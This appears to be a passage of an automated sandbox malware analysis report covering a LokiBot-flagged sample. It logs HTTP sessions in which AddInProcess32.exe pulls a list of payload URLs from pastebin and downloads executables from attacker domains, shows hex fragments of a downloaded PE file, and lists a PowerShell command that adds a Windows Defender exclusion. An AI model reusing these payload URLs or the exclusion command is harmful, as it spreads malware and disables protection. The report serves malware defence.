                                                                                                                                                                                                                                                            Data Ascii: 'absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            62192.168.2.555641104.20.68.14344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC50OUTGET /raw/E0rY26ni HTTP/1.1
                                                                                                                                                                                                                                                            Host: pastebin.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC395INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 8
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:53 GMT
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203c7f940ad7-LAS
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC800INData Raw: 33 31 39 0d 0a 68 74 74 70 3a 2f 2f 31 38 35 2e 31 37 32 2e 31 32 38 2e 31 32 36 2f 49 6e 73 74 61 6c 6c 53 65 74 75 70 35 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 62 69 74 62 75 63 6b 65 74 2e 6f 72 67 2f 6a 2d 75 70 73 70 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6e 65 74 77 6f 72 6b 31 2f 64 6f 77 6e 6c 6f 61 64 73 2f 61 30 32 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 68 69 70 6f 66 64 65 73 74 69 6e 79 2e 63 6f 6d 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 0d 0a 68 74 74 70 73 3a 2f 2f 73 74 79 2e 69 6e 6b 2f 70 70 67 38 78 0d 0a 68 74 74 70 73 3a 2f 2f 6e 61 6d 65 6d 61 69 6c 2e 6f 72 67 2f 36 37 37 39 64 38 39 62 37 61 33 36 38 66 34 66 33 66 33 34 30 62 35 30 61 39 64 31 38 64 37 31
                                                                                                                                                                                                                                                            Data Ascii: 319http://185.172.128.126/InstallSetup5.exehttps://bitbucket.org/j-upsps/microsoft_network1/downloads/a02.exehttps://shipofdestiny.com/baf14778c246e15550645e30ba78ce1c.exehttps://sty.ink/ppg8xhttps://namemail.org/6779d89b7a368f4f3f340b50a9d18d71
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            63192.168.2.555640172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC106OUTGET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC680INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:01 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 5
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=m1MAdR%2FRuWp%2BPzONBGC1IedvPlYhWs8SQev6X%2BfL8Ao0nNgkc12BmgVvadabPT1QrtGOs9d6msxBeTfreD%2BIGVw5k4hxYv2UYS00pKazZR9tW3t86MJWWnvZd5sF4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8628203c7ea50a01-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC689INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 66 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00
                                                                                                                                                                                                                                                            Data Ascii: fff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:31:01 UTC1369INData Raw: 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            64192.168.2.555644104.21.32.14244344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:31:02 UTC79OUTGET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: shipofdestiny.com
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC699INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:31:03 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Location: https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pYYOHmAL61k1prhi30wneQXp3lp%2B6DFR4mkpRE8hnXWEg8PmV5S0qbs76XqsDd33E8POZK4gyQZkxHjigXzMcubaWKf1haLgyyWf%2BZKZMPWqaOVYWafBmJfAW4kDna3M8Imdng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 862820445c4b0ad5-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC135INData Raw: 38 31 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 61 77 79 65 72 62 75 79 65 72 2e 6f 72 67 2f 32 36 62 36 32 36 66 65 61 32 39 30 31 35 61 39 66 32 34 65 30 37 61 30 38 66 61 30 31 31 65 34 2f 62 61 66 31 34 37 37 38 63 32 34 36 65 31 35 35 35 30 36 34 35 65 33 30 62 61 37 38 63 65 31 63 2e 65 78 65 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 81<a href="https://lawyerbuyer.org/26b626fea29015a9f24e07a08fa011e4/baf14778c246e15550645e30ba78ce1c.exe">Temporary Redirect</a>.
                                                                                                                                                                                                                                                            2024-03-11 02:31:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:03:30:32
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            Imagebase:0x1ebaaa20000
                                                                                                                                                                                                                                                            File size:48'352 bytes
                                                                                                                                                                                                                                                            MD5 hash:F1E075F8CEBE5AACA53ED7C158D81CBD
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:03:30:49
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Imagebase:0xdb0000
                                                                                                                                                                                                                                                            File size:43'008 bytes
                                                                                                                                                                                                                                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.4581208018.000000000A499000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                            • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000005.00000002.4581208018.000000000A6D9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                            Start time:03:30:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                                                                            File size:43'008 bytes
                                                                                                                                                                                                                                                            MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                            Start time:03:30:51
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 3876 -s 134468
                                                                                                                                                                                                                                                            Imagebase:0x7ff77b080000
                                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                            Start time:03:30:56
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
